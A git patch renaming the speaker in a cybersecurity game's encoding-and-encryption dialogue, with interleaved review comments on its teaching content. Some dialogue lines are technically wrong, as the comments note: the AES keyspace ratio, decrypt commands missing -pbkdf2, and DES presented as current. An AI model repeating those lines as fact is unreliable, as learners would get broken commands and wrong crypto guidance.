From 3ccfe9d99aeecad8766bd530dc63a596eb3aadf8 Mon Sep 17 00:00:00 2001 From: "Z. Cliffe Schreuders" Date: Wed, 19 Nov 2025 18:24:26 +0000 Subject: [PATCH] feat: Update remaining game scenario files to Haxolottle dialogue - exploitation.ink - post_exploitation.ink - phishing_social_engineering.ink - encoding_encryption.ink - feeling_blu_ctf.ink All files now use consistent Haxolottle character and conversational tone --- .../game_scenarios/encoding_encryption.ink | 308 +++---- .../ink/game_scenarios/exploitation.ink | 120 +-- .../ink/game_scenarios/feeling_blu_ctf.ink | 398 ++++----- .../phishing_social_engineering.ink | 110 +-- .../ink/game_scenarios/post_exploitation.ink | 764 +++++++++--------- 5 files changed, 850 insertions(+), 850 deletions(-) diff --git a/story_design/ink/game_scenarios/encoding_encryption.ink b/story_design/ink/game_scenarios/encoding_encryption.ink index 2e8fb95..9c1ae73 100644 --- a/story_design/ink/game_scenarios/encoding_encryption.ink +++ b/story_design/ink/game_scenarios/encoding_encryption.ink @@ -7,7 +7,7 @@ // =========================================== // Global persistent state -VAR instructor_rapport = 0 +VAR haxolottle_rapport = 0 // External variables EXTERNAL player_name 
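Review bot: the `VAR instructor_rapport` -> `VAR haxolottle_rapport` rename sits directly under the `// Global persistent state` comment, so any saved game state or host-side binding that addresses the variable by its old name will silently lose the rapport value after this change; either keep the old name as a compatibility alias or confirm in the PR description that the persistence layer tolerates a renamed global.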
@@ -17,13 +17,13 @@ EXTERNAL player_name // =========================================== === start === -Crypto Instructor: Welcome to Cryptography Fundamentals, Agent {player_name}. +Haxolottle: Welcome to Cryptography Fundamentals, Agent {player_name}. -Crypto Instructor: Today we're covering encoding and encryption - two concepts that sound similar but serve very different purposes. +Haxolottle: Today we're covering encoding and encryption - two concepts that sound similar but serve very different purposes. -Crypto Instructor: You'll learn about encoding schemes like Base64 and hexadecimal, symmetric encryption with AES and DES, and asymmetric cryptography with GPG. +Haxolottle: You'll learn about encoding schemes like Base64 and hexadecimal, symmetric encryption with AES and DES, and asymmetric cryptography with GPG. -Crypto Instructor: These skills are essential for any security professional. Let's begin. +Haxolottle: These skills are essential for any security professional. Let's begin. -> crypto_hub @@ -32,7 +32,7 @@ Crypto Instructor: These skills are essential for any security professional. Let // =========================================== === crypto_hub === -Crypto Instructor: What would you like to explore? +Haxolottle: What would you like to explore? + [Encoding vs Encryption - what's the difference?] -> encoding_vs_encryption 
@@ -61,26 +61,26 @@ Crypto Instructor: What would you like to explore? // =========================================== === encoding_vs_encryption === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: Excellent starting point. These terms get confused constantly. +Haxolottle: Excellent starting point. These terms get confused constantly. -Crypto Instructor: **Encoding** transforms data into a different format using a publicly known, reversible scheme. Anyone can decode it - no secret required. +Haxolottle: **Encoding** transforms data into a different format using a publicly known, reversible scheme. Anyone can decode it - no secret required. -Crypto Instructor: **Encryption** transforms data into a format readable only with a key or password. Without the key, the data is protected. +Haxolottle: **Encryption** transforms data into a format readable only with a key or password. Without the key, the data is protected. -Crypto Instructor: Think of it this way: encoding is like translating a book to a different language. Anyone with the right dictionary can read it. Encryption is like using a secret cipher - only those with the key can decode it. +Haxolottle: Think of it this way: encoding is like translating a book to a different language. Anyone with the right dictionary can read it. Encryption is like using a secret cipher - only those with the key can decode it. * [Why use encoding if it's not secure?] - ~ instructor_rapport += 8 + ~ haxolottle_rapport += 8 You: If encoding doesn't provide security, why use it? - Crypto Instructor: Compatibility and efficiency. Base64, for instance, lets you safely transmit binary data over text-only protocols like email. Hexadecimal makes binary data human-readable for debugging. - Crypto Instructor: Encoding solves technical problems. Encryption solves security problems. Different tools for different jobs. + Haxolottle: Compatibility and efficiency. 
Base64, for instance, lets you safely transmit binary data over text-only protocols like email. Hexadecimal makes binary data human-readable for debugging. + Haxolottle: Encoding solves technical problems. Encryption solves security problems. Different tools for different jobs. * [Can you give examples of each?] You: What are common examples of encoding and encryption? - Crypto Instructor: Encoding: Base64, hexadecimal, ASCII, URL encoding. Used for data representation. - Crypto Instructor: Encryption: AES, RSA, DES. Used for data protection. - Crypto Instructor: If you find Base64 data, don't assume it's encrypted - it's just encoded. Trivial to reverse. + Haxolottle: Encoding: Base64, hexadecimal, ASCII, URL encoding. Used for data representation. + Haxolottle: Encryption: AES, RSA, DES. Used for data protection. + Haxolottle: If you find Base64 data, don't assume it's encrypted - it's just encoded. Trivial to reverse. * [Got it] You: Clear distinction. - -> crypto_hub 
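Review bot: in the `[Can you give examples of each?]` branch, `Haxolottle: Encryption: AES, RSA, DES. Used for data protection.` presents DES as a current data-protection algorithm, which contradicts the des_explanation knot later in this same file (56-bit key, brute-forced in 1999, superseded by AES); mark it as legacy on this line, e.g. `Encryption: AES, RSA (and legacy DES, now broken)`. Everything else in the hunk is a pure speaker rename.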
@@ -90,34 +90,34 @@ Crypto Instructor: Think of it this way: encoding is like translating a book to // =========================================== === character_encoding === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: Let's start with the basics - how computers represent text. +Haxolottle: Let's start with the basics - how computers represent text. -Crypto Instructor: ASCII - American Standard Code for Information Interchange. Maps characters to numbers. For example, "hello!" is: +Haxolottle: ASCII - American Standard Code for Information Interchange. Maps characters to numbers. For example, "hello!" is: - Decimal: 104 101 108 108 111 33 - Hex: 68 65 6c 6c 6f 21 - Binary: 01101000 01100101 01101100 01101100 01101111 00100001 -Crypto Instructor: All the same data, just different representations. +Haxolottle: All the same data, just different representations. * [Why multiple representations?] - ~ instructor_rapport += 8 + ~ haxolottle_rapport += 8 You: Why do we need so many ways to represent the same thing? - Crypto Instructor: Context. Humans read decimal. Computers process binary. Hex is compact for humans to read binary - two hex digits per byte. - Crypto Instructor: Choose the representation that fits your needs. Debugging network traffic? Hex. Mathematical operations? Decimal. Actual processing? Binary. + Haxolottle: Context. Humans read decimal. Computers process binary. Hex is compact for humans to read binary - two hex digits per byte. + Haxolottle: Choose the representation that fits your needs. Debugging network traffic? Hex. Mathematical operations? Decimal. Actual processing? Binary. * [Tell me about Unicode] You: How does Unicode fit in? - Crypto Instructor: ASCII is 7-bit, covers English characters. Unicode extends this to support every language, emoji, symbols. - Crypto Instructor: UTF-8 is the dominant Unicode encoding - backward-compatible with ASCII, supports international characters efficiently. 
- Crypto Instructor: Most modern systems use UTF-8 by default. + Haxolottle: ASCII is 7-bit, covers English characters. Unicode extends this to support every language, emoji, symbols. + Haxolottle: UTF-8 is the dominant Unicode encoding - backward-compatible with ASCII, supports international characters efficiently. + Haxolottle: Most modern systems use UTF-8 by default. * [Show me practical commands] You: What commands convert between these formats? - Crypto Instructor: `xxd` is your friend. Try: + Haxolottle: `xxd` is your friend. Try: - `echo hello! | xxd` for hex output - `echo hello! | xxd -b` for binary - `echo 68656c6c6f21 | xxd -r -p` to convert hex back to text - Crypto Instructor: Python's also excellent: `"hello!".encode().hex()` gets you hex. + Haxolottle: Python's also excellent: `"hello!".encode().hex()` gets you hex. - -> crypto_hub // =========================================== 
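Review bot: the `[Show me practical commands]` branch has a small correctness trap: `echo hello! | xxd` includes the trailing newline that echo appends, so the dump ends in `0a` after the `21` shown in the decimal/hex/binary table above, and `echo 68656c6c6f21 | xxd -r -p` prints `hello!` with no newline, so the next shell prompt lands on the same line. Suggest `printf 'hello!' | xxd` (or `echo -n`) so the output matches the table, and one dialogue line explaining the extra byte, since learners will otherwise wonder where it came from.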
@@ -125,31 +125,31 @@ Crypto Instructor: All the same data, just different representations. // =========================================== === hex_and_base64 === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: Two encoding schemes you'll encounter constantly: hexadecimal and Base64. +Haxolottle: Two encoding schemes you'll encounter constantly: hexadecimal and Base64. -Crypto Instructor: **Hexadecimal**: Base-16. Uses 0-9 and a-f. Two hex characters per byte. Compact, human-readable representation of binary data. +Haxolottle: **Hexadecimal**: Base-16. Uses 0-9 and a-f. Two hex characters per byte. Compact, human-readable representation of binary data. -Crypto Instructor: **Base64**: Uses A-Z, a-z, 0-9, +, /, and = for padding. More efficient than hex for transmitting binary data. Four characters represent three bytes. +Haxolottle: **Base64**: Uses A-Z, a-z, 0-9, +, /, and = for padding. More efficient than hex for transmitting binary data. Four characters represent three bytes. * [When do I use Base64 vs hex?] - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 You: How do I choose between Base64 and hex? - Crypto Instructor: Base64 when efficiency matters - 33% overhead vs 100% for hex. Common in web protocols, email attachments, JSON/XML with binary data. - Crypto Instructor: Hex when human readability and debugging matter. Easier to spot patterns, map directly to bytes. - Crypto Instructor: In CTFs and forensics? You'll see both constantly. Learn to recognize them on sight. + Haxolottle: Base64 when efficiency matters - 33% overhead vs 100% for hex. Common in web protocols, email attachments, JSON/XML with binary data. + Haxolottle: Hex when human readability and debugging matter. Easier to spot patterns, map directly to bytes. + Haxolottle: In CTFs and forensics? You'll see both constantly. Learn to recognize them on sight. * [Show me Base64 commands] You: Walk me through Base64 encoding. 
- Crypto Instructor: Simple: `echo "text" | base64` encodes. `echo "encoded" | base64 -d` decodes. - Crypto Instructor: Try this chain: `echo "Valhalla" | base64 | xxd -p | xxd -r -p | base64 -d` - Crypto Instructor: You're encoding to Base64, converting to hex, converting back, decoding Base64. Should get "Valhalla" back. Demonstrates reversibility. + Haxolottle: Simple: `echo "text" | base64` encodes. `echo "encoded" | base64 -d` decodes. + Haxolottle: Try this chain: `echo "Valhalla" | base64 | xxd -p | xxd -r -p | base64 -d` + Haxolottle: You're encoding to Base64, converting to hex, converting back, decoding Base64. Should get "Valhalla" back. Demonstrates reversibility. * [How do I recognize Base64?] You: How can I identify Base64 when I see it? - Crypto Instructor: Look for: alphanumeric characters, sometimes with + and /, often ending in = or ==. - Crypto Instructor: Length is always multiple of 4 (due to padding). - Crypto Instructor: Classic tell: mix of uppercase, lowercase, and numbers, ending in equals signs. - Crypto Instructor: Example: `VmFsaGFsbGEK` - that's Base64. + Haxolottle: Look for: alphanumeric characters, sometimes with + and /, often ending in = or ==. + Haxolottle: Length is always multiple of 4 (due to padding). + Haxolottle: Classic tell: mix of uppercase, lowercase, and numbers, ending in equals signs. + Haxolottle: Example: `VmFsaGFsbGEK` - that's Base64. - -> crypto_hub // =========================================== 
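Review bot: the `[How do I recognize Base64?]` branch overstates the padding tell. `Length is always multiple of 4 (due to padding)` and `often ending in = or ==` hold for standard Base64, but `=` only appears when the input length is not a multiple of 3, and the hunk's own example `VmFsaGFsbGEK` (9 bytes in, 12 characters out, no `=`) demonstrates that; the URL-safe alphabet (`-` and `_` in place of `+` and `/`) used in JWTs and many web tokens is also commonly emitted with no padding at all. Add one line saying that a missing `=` does not rule Base64 out and that `-`/`_` indicate the URL-safe variant.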
@@ -157,11 +157,11 @@ Crypto Instructor: **Base64**: Uses A-Z, a-z, 0-9, +, /, and = for padding. More // =========================================== === symmetric_encryption === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: Symmetric encryption - the same key encrypts and decrypts. Fast, efficient, but has a key distribution problem. +Haxolottle: Symmetric encryption - the same key encrypts and decrypts. Fast, efficient, but has a key distribution problem. -Crypto Instructor: Two main algorithms you'll use: DES and AES. +Haxolottle: Two main algorithms you'll use: DES and AES. * [Tell me about DES] You: What's DES? 
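Review bot: `Two main algorithms you'll use: DES and AES.` tells the learner they will use DES, which the des_explanation knot introduced in the next hunk says not to use for real security; `you'll encounter` would be consistent with the rest of the file.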
@@ -170,68 +170,68 @@ Crypto Instructor: Two main algorithms you'll use: DES and AES. You: What's AES? -> aes_explanation * [What's the key distribution problem?] - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 You: You mentioned a key distribution problem? - Crypto Instructor: The fundamental challenge of symmetric crypto: how do you securely share the key? - Crypto Instructor: If you encrypt a message with AES, your recipient needs the same key to decrypt. How do you get them the key without an attacker intercepting it? - Crypto Instructor: This is where public key crypto comes in - or secure key exchange protocols like Diffie-Hellman. + Haxolottle: The fundamental challenge of symmetric crypto: how do you securely share the key? + Haxolottle: If you encrypt a message with AES, your recipient needs the same key to decrypt. How do you get them the key without an attacker intercepting it? + Haxolottle: This is where public key crypto comes in - or secure key exchange protocols like Diffie-Hellman. -> symmetric_encryption * [Back to main menu] -> crypto_hub === des_explanation === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: DES - Data Encryption Standard. Developed by IBM in the 1970s, based on Feistel ciphers. +Haxolottle: DES - Data Encryption Standard. Developed by IBM in the 1970s, based on Feistel ciphers. -Crypto Instructor: 56-bit key size. Small by modern standards - brute-forceable in reasonable time with modern hardware. +Haxolottle: 56-bit key size. Small by modern standards - brute-forceable in reasonable time with modern hardware. -Crypto Instructor: Historical importance, but don't use it for real security anymore. Superseded by AES. +Haxolottle: Historical importance, but don't use it for real security anymore. Superseded by AES. 
-Crypto Instructor: OpenSSL command: `openssl enc -des-cbc -pbkdf2 -in file.txt -out file.enc` +Haxolottle: OpenSSL command: `openssl enc -des-cbc -pbkdf2 -in file.txt -out file.enc` * [Why is 56-bit insufficient?] - ~ instructor_rapport += 8 + ~ haxolottle_rapport += 8 You: Why is 56 bits too small? - Crypto Instructor: 2^56 possible keys - about 72 quadrillion. Sounds large, but modern systems can test millions or billions of keys per second. - Crypto Instructor: DES was cracked in less than 24 hours in 1999. Hardware has only improved since then. - Crypto Instructor: Compare to AES-256: 2^256 keys. Astronomically larger. Not brute-forceable with current or foreseeable technology. + Haxolottle: 2^56 possible keys - about 72 quadrillion. Sounds large, but modern systems can test millions or billions of keys per second. + Haxolottle: DES was cracked in less than 24 hours in 1999. Hardware has only improved since then. + Haxolottle: Compare to AES-256: 2^256 keys. Astronomically larger. Not brute-forceable with current or foreseeable technology. * [Show me the decryption command] You: How do I decrypt DES-encrypted data? - Crypto Instructor: `openssl enc -des-cbc -d -in file.enc -out decrypted.txt` - Crypto Instructor: The `-d` flag specifies decryption. You'll be prompted for the password. - Crypto Instructor: Note: password and key aren't quite the same. The password is hashed with PBKDF2 to derive the actual encryption key. + Haxolottle: `openssl enc -des-cbc -d -in file.enc -out decrypted.txt` + Haxolottle: The `-d` flag specifies decryption. You'll be prompted for the password. + Haxolottle: Note: password and key aren't quite the same. The password is hashed with PBKDF2 to derive the actual encryption key. - -> symmetric_encryption === aes_explanation === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: AES - Advanced Encryption Standard. The modern symmetric encryption standard. +Haxolottle: AES - Advanced Encryption Standard. 
The modern symmetric encryption standard. -Crypto Instructor: 128-bit block cipher. Key sizes: 128, 192, or 256 bits. Uses substitution-permutation network - combination of substitution, permutation, mixing, and key addition. +Haxolottle: 128-bit block cipher. Key sizes: 128, 192, or 256 bits. Uses substitution-permutation network - combination of substitution, permutation, mixing, and key addition. -Crypto Instructor: Fast, secure, widely supported. This is what you should be using for symmetric encryption. +Haxolottle: Fast, secure, widely supported. This is what you should be using for symmetric encryption. * [How much stronger is AES than DES?] - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 You: Quantify the security improvement over DES. - Crypto Instructor: DES: 2^56 keyspace. AES-128: 2^128. AES-256: 2^256. - Crypto Instructor: AES-128 has 2^72 times more keys than DES. AES-256 has 2^200 times more keys than AES-128. - Crypto Instructor: To put it in perspective: if you could test a trillion trillion keys per second, AES-256 would still take longer than the age of the universe to brute force. - Crypto Instructor: Practical attacks on AES focus on implementation flaws, side channels, or compromising the key - not brute forcing. + Haxolottle: DES: 2^56 keyspace. AES-128: 2^128. AES-256: 2^256. + Haxolottle: AES-128 has 2^72 times more keys than DES. AES-256 has 2^200 times more keys than AES-128. + Haxolottle: To put it in perspective: if you could test a trillion trillion keys per second, AES-256 would still take longer than the age of the universe to brute force. + Haxolottle: Practical attacks on AES focus on implementation flaws, side channels, or compromising the key - not brute forcing. * [Show me AES commands] You: Walk me through AES encryption. 
- Crypto Instructor: Encrypt: `openssl enc -aes-256-cbc -pbkdf2 -in file.txt -out file.enc` - Crypto Instructor: Decrypt: `openssl enc -aes-256-cbc -d -in file.enc -out file.txt` - Crypto Instructor: You can use -aes-128-cbc, -aes-192-cbc, or -aes-256-cbc depending on key size. - Crypto Instructor: CBC mode is Cipher Block Chaining. ECB mode also available but has security weaknesses - avoid for real use. + Haxolottle: Encrypt: `openssl enc -aes-256-cbc -pbkdf2 -in file.txt -out file.enc` + Haxolottle: Decrypt: `openssl enc -aes-256-cbc -d -in file.enc -out file.txt` + Haxolottle: You can use -aes-128-cbc, -aes-192-cbc, or -aes-256-cbc depending on key size. + Haxolottle: CBC mode is Cipher Block Chaining. ECB mode also available but has security weaknesses - avoid for real use. * [What's CBC mode?] - ~ instructor_rapport += 8 + ~ haxolottle_rapport += 8 You: Explain CBC mode. - Crypto Instructor: Cipher Block Chaining. Each block of plaintext is XORed with the previous ciphertext block before encryption. - Crypto Instructor: This means identical plaintext blocks produce different ciphertext - hides patterns. - Crypto Instructor: ECB (Electronic Codebook) encrypts each block independently - same input always produces same output. Leaks pattern information. - Crypto Instructor: Always use CBC or more modern modes like GCM. Never use ECB for real data. + Haxolottle: Cipher Block Chaining. Each block of plaintext is XORed with the previous ciphertext block before encryption. + Haxolottle: This means identical plaintext blocks produce different ciphertext - hides patterns. + Haxolottle: ECB (Electronic Codebook) encrypts each block independently - same input always produces same output. Leaks pattern information. + Haxolottle: Always use CBC or more modern modes like GCM. Never use ECB for real data. - -> symmetric_encryption // =========================================== 
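Review bot: the decrypt commands in this hunk will not decrypt what the encrypt commands produce. `openssl enc -des-cbc -pbkdf2 -in file.txt -out file.enc` and `openssl enc -aes-256-cbc -pbkdf2 -in file.txt -out file.enc` derive the key with PBKDF2, but `openssl enc -des-cbc -d -in file.enc -out decrypted.txt` and `openssl enc -aes-256-cbc -d -in file.enc -out file.txt` omit `-pbkdf2`, so OpenSSL falls back to the legacy EVP_BytesToKey derivation, computes a different key and fails with `bad decrypt` (or occasionally emits garbage that happens to pass the padding check). Add `-pbkdf2` to both decrypt lines (`-d` does not imply it) and make the `Note: password and key aren't quite the same` line say that the PBKDF2 derivation only happens when `-pbkdf2` is passed. Two smaller points: `AES-256 has 2^200 times more keys than AES-128` is wrong, since 2^256 / 2^128 = 2^128; and `Always use CBC or more modern modes like GCM` should warn that `openssl enc` CBC output carries no integrity protection (ciphertext is malleable and padding-oracle attacks exist), and that `openssl enc` refuses AEAD modes such as GCM, so a learner who tries `-aes-256-gcm` with this command will get an error rather than an authenticated file.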
@@ -239,34 +239,34 @@ Crypto Instructor: Fast, secure, widely supported. This is what you should be us // =========================================== === public_key_crypto === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: Asymmetric cryptography. Revolutionary concept - separate keys for encryption and decryption. +Haxolottle: Asymmetric cryptography. Revolutionary concept - separate keys for encryption and decryption. -Crypto Instructor: **Public key**: shared freely. Anyone can use it to encrypt messages to you. +Haxolottle: **Public key**: shared freely. Anyone can use it to encrypt messages to you. **Private key**: kept secret. Only you can decrypt messages encrypted with your public key. -Crypto Instructor: Solves the key distribution problem. You can publish your public key openly - doesn't compromise security. +Haxolottle: Solves the key distribution problem. You can publish your public key openly - doesn't compromise security. * [How does this actually work?] - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 You: What's the underlying mechanism? - Crypto Instructor: Mathematics - specifically, functions that are easy to compute in one direction but extremely hard to reverse without special information. - Crypto Instructor: RSA uses factoring large prime numbers. Easy to multiply two huge primes, nearly impossible to factor the result back without knowing the primes. - Crypto Instructor: Your private key contains the primes. Your public key contains their product. Encryption uses the product, decryption needs the primes. - Crypto Instructor: Full math is beyond this course, but that's the essence. One-way mathematical trap doors. + Haxolottle: Mathematics - specifically, functions that are easy to compute in one direction but extremely hard to reverse without special information. + Haxolottle: RSA uses factoring large prime numbers. 
Easy to multiply two huge primes, nearly impossible to factor the result back without knowing the primes. + Haxolottle: Your private key contains the primes. Your public key contains their product. Encryption uses the product, decryption needs the primes. + Haxolottle: Full math is beyond this course, but that's the essence. One-way mathematical trap doors. * [What's the downside?] - ~ instructor_rapport += 8 + ~ haxolottle_rapport += 8 You: This sounds perfect. What's the catch? - Crypto Instructor: Performance. Asymmetric crypto is much slower than symmetric. - Crypto Instructor: Typical use: asymmetric crypto to exchange a symmetric key, then symmetric crypto for actual data. - Crypto Instructor: TLS/SSL does exactly this - RSA or ECDH to agree on a session key, then AES to encrypt the connection. - Crypto Instructor: Hybrid approach gets security of asymmetric with performance of symmetric. + Haxolottle: Performance. Asymmetric crypto is much slower than symmetric. + Haxolottle: Typical use: asymmetric crypto to exchange a symmetric key, then symmetric crypto for actual data. + Haxolottle: TLS/SSL does exactly this - RSA or ECDH to agree on a session key, then AES to encrypt the connection. + Haxolottle: Hybrid approach gets security of asymmetric with performance of symmetric. * [Tell me about GPG] You: How does GPG fit into this? - Crypto Instructor: GPG - GNU Privacy Guard. Open source implementation of PGP (Pretty Good Privacy). - Crypto Instructor: Provides public-key crypto for email encryption, file encryption, digital signatures. - Crypto Instructor: Industry standard for email security and file protection. + Haxolottle: GPG - GNU Privacy Guard. Open source implementation of PGP (Pretty Good Privacy). + Haxolottle: Provides public-key crypto for email encryption, file encryption, digital signatures. + Haxolottle: Industry standard for email security and file protection. -> gpg_intro - -> crypto_hub 
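Review bot: two imprecisions in the `[How does this actually work?]` and `[What's the downside?]` branches. `RSA uses factoring large prime numbers` should say that RSA relies on the difficulty of factoring the product of two large primes (the primes themselves are not what gets factored), and `Your private key contains the primes` is a simplification: the private key is the exponent d, computed from the primes, and keeping p and q around is an optimisation. `TLS/SSL does exactly this - RSA or ECDH to agree on a session key` is dated: TLS 1.3 removed RSA key transport and uses only ephemeral (EC)DHE for key agreement, with RSA or ECDSA left for signatures, so `ECDHE for key agreement, RSA or ECDSA for authentication` would match current deployments.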
@@ -275,35 +275,35 @@ Crypto Instructor: Solves the key distribution problem. You can publish your pub // =========================================== === openssl_tools === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: OpenSSL - the Swiss Army knife of cryptography. +Haxolottle: OpenSSL - the Swiss Army knife of cryptography. -Crypto Instructor: It's a toolkit implementing SSL/TLS protocols and providing cryptographic functions. Command-line tool plus libraries. +Haxolottle: It's a toolkit implementing SSL/TLS protocols and providing cryptographic functions. Command-line tool plus libraries. -Crypto Instructor: Can do: key generation, encryption, decryption, hashing, certificate management, SSL/TLS testing, and much more. +Haxolottle: Can do: key generation, encryption, decryption, hashing, certificate management, SSL/TLS testing, and much more. * [Show me useful commands] You: What are the most useful OpenSSL commands? - Crypto Instructor: List available ciphers: `openssl list -cipher-algorithms` - Crypto Instructor: Generate hash: `echo "data" | openssl dgst -sha256` - Crypto Instructor: Encrypt file: `openssl enc -aes-256-cbc -in file -out file.enc` - Crypto Instructor: Check certificate: `openssl x509 -in cert.pem -text -noout` - Crypto Instructor: Test SSL connection: `openssl s_client -connect example.com:443` - Crypto Instructor: Generate random bytes: `openssl rand -hex 32` + Haxolottle: List available ciphers: `openssl list -cipher-algorithms` + Haxolottle: Generate hash: `echo "data" | openssl dgst -sha256` + Haxolottle: Encrypt file: `openssl enc -aes-256-cbc -in file -out file.enc` + Haxolottle: Check certificate: `openssl x509 -in cert.pem -text -noout` + Haxolottle: Test SSL connection: `openssl s_client -connect example.com:443` + Haxolottle: Generate random bytes: `openssl rand -hex 32` * [Tell me about the 2014 vulnerability] - ~ instructor_rapport += 15 + ~ haxolottle_rapport += 15 You: You mentioned a major OpenSSL 
vulnerability in 2014? - Crypto Instructor: Heartbleed. CVE-2014-0160. One of the most significant security flaws in internet history. - Crypto Instructor: Bug in OpenSSL's implementation of TLS heartbeat extension. Allowed attackers to read server memory - including private keys, passwords, session tokens. - Crypto Instructor: Affected two-thirds of web servers. Required widespread patching and certificate replacement. - Crypto Instructor: Important lesson: even cryptographic implementations can have bugs. The algorithms (AES, RSA) were fine - the implementation was flawed. - Crypto Instructor: This is why: keep software updated, use well-audited libraries, implement defense in depth. + Haxolottle: Heartbleed. CVE-2014-0160. One of the most significant security flaws in internet history. + Haxolottle: Bug in OpenSSL's implementation of TLS heartbeat extension. Allowed attackers to read server memory - including private keys, passwords, session tokens. + Haxolottle: Affected two-thirds of web servers. Required widespread patching and certificate replacement. + Haxolottle: Important lesson: even cryptographic implementations can have bugs. The algorithms (AES, RSA) were fine - the implementation was flawed. + Haxolottle: This is why: keep software updated, use well-audited libraries, implement defense in depth. * [How do I check OpenSSL version?] You: How do I know what version I'm running? - Crypto Instructor: `openssl version -a` shows version and build details. - Crypto Instructor: Post-Heartbleed, you want OpenSSL 1.0.1g or later, or 1.0.2 series. - Crypto Instructor: Most modern systems use OpenSSL 1.1.1 or 3.x now. + Haxolottle: `openssl version -a` shows version and build details. + Haxolottle: Post-Heartbleed, you want OpenSSL 1.0.1g or later, or 1.0.2 series. + Haxolottle: Most modern systems use OpenSSL 1.1.1 or 3.x now. - -> crypto_hub // =========================================== 
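Review bot: `Encrypt file: openssl enc -aes-256-cbc -in file -out file.enc` in the `[Show me useful commands]` branch drops the `-pbkdf2` that every other enc command in this file uses, so it triggers OpenSSL's `deprecated key derivation used` warning and produces a file the file's own `-pbkdf2` commands cannot decrypt; add the flag here. In the Heartbleed branch, the choice text `You mentioned a major OpenSSL vulnerability in 2014?` follows no line in which Haxolottle mentioned it, so either seed the mention in the intro lines or reword the choice. `Affected two-thirds of web servers` conflates the share of servers running OpenSSL with the share that was vulnerable; only 1.0.1 through 1.0.1f were affected, so state the two facts separately. The version guidance in the last branch (1.0.1g, 1.0.2, 1.1.1) is entirely end-of-life; recommend a supported 3.x release and say that 1.1.1 and earlier no longer receive security fixes. Minor: `openssl s_client -connect example.com:443` should add `-servername example.com` so SNI-dependent hosts return the right certificate.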
@@ -311,37 +311,37 @@ Crypto Instructor: Can do: key generation, encryption, decryption, hashing, cert // =========================================== === gpg_intro === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Crypto Instructor: GPG - GNU Privacy Guard. Open-source public-key cryptography and signing tool. +Haxolottle: GPG - GNU Privacy Guard. Open-source public-key cryptography and signing tool. -Crypto Instructor: Core concepts: key pairs (public and private), encryption, decryption, signing, verification. +Haxolottle: Core concepts: key pairs (public and private), encryption, decryption, signing, verification. * [Walk me through key generation] You: How do I create GPG keys? - Crypto Instructor: `gpg --gen-key` starts the process. You'll provide name, email, passphrase. - Crypto Instructor: This creates a key pair. Public key you share, private key you protect. - Crypto Instructor: The passphrase protects your private key - don't forget it! Without it, your private key is useless. + Haxolottle: `gpg --gen-key` starts the process. You'll provide name, email, passphrase. + Haxolottle: This creates a key pair. Public key you share, private key you protect. + Haxolottle: The passphrase protects your private key - don't forget it! Without it, your private key is useless. * [How do I share my public key?] You: How do others get my public key? - Crypto Instructor: Export it: `gpg --export -a "Your Name" > public.key` - Crypto Instructor: This creates ASCII-armored public key file. Share it via email, website, key server. - Crypto Instructor: Recipients import it: `gpg --import public.key` - Crypto Instructor: Now they can encrypt messages only you can read. + Haxolottle: Export it: `gpg --export -a "Your Name" > public.key` + Haxolottle: This creates ASCII-armored public key file. Share it via email, website, key server. + Haxolottle: Recipients import it: `gpg --import public.key` + Haxolottle: Now they can encrypt messages only you can read. 
* [Encrypting and decrypting] You: Show me the encryption workflow. - Crypto Instructor: Encrypt: `gpg -e -r "Recipient Name" file.txt` creates file.txt.gpg - Crypto Instructor: Decrypt: `gpg -d file.txt.gpg > decrypted.txt` - Crypto Instructor: Recipient's public key must be in your keyring to encrypt for them. - Crypto Instructor: Your private key must be available to decrypt messages to you. + Haxolottle: Encrypt: `gpg -e -r "Recipient Name" file.txt` creates file.txt.gpg + Haxolottle: Decrypt: `gpg -d file.txt.gpg > decrypted.txt` + Haxolottle: Recipient's public key must be in your keyring to encrypt for them. + Haxolottle: Your private key must be available to decrypt messages to you. * [What about digital signatures?] - ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 You: How do signatures work? - Crypto Instructor: Signatures prove a message came from you and wasn't modified. - Crypto Instructor: Sign: `gpg -s file.txt` - creates file.txt.gpg with signature - Crypto Instructor: Verify: `gpg --verify file.txt.gpg` - confirms signature and shows signer - Crypto Instructor: Uses your private key to sign, others use your public key to verify. Reverse of encryption. - Crypto Instructor: Provides authenticity and integrity - critical for software distribution, secure communications. + Haxolottle: Signatures prove a message came from you and wasn't modified. + Haxolottle: Sign: `gpg -s file.txt` - creates file.txt.gpg with signature + Haxolottle: Verify: `gpg --verify file.txt.gpg` - confirms signature and shows signer + Haxolottle: Uses your private key to sign, others use your public key to verify. Reverse of encryption. + Haxolottle: Provides authenticity and integrity - critical for software distribution, secure communications. - -> crypto_hub // =========================================== 
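Review bot: the `[How do I share my public key?]` branch goes straight from `Share it via email, website, key server` to `gpg --import public.key` and `Now they can encrypt messages only you can read` without any fingerprint check, which is the classic PGP failure mode: whoever can substitute the key on that email/website/key-server path receives the messages instead. Add a line telling the recipient to compare `gpg --fingerprint "Your Name"` against a fingerprint obtained out of band before relying on the key, and mention that `gpg -e -r "Recipient Name" file.txt` will prompt `There is no assurance this key belongs to the named user` for an imported but unverified key, so learners are not surprised by the `Use this key anyway?` question.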
